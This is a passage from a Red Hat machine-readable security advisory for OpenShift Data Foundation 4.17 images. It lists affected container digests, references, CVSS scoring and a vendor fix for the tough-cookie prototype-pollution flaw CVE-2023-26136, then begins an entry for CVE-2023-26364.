"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26136"
},
{
"category": "external",
"summary": "RHBZ#2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e",
"url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/issues/282",
"url": "https://github.com/salesforce/tough-cookie/issues/282"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3",
"url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3"
},
{
"category": "external",
"summary": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873",
"url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873"
}
],
"release_date": "2023-07-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tough-cookie: prototype pollution in cookie memstore"
},
{
"cve": "CVE-2023-26364",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2023-11-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
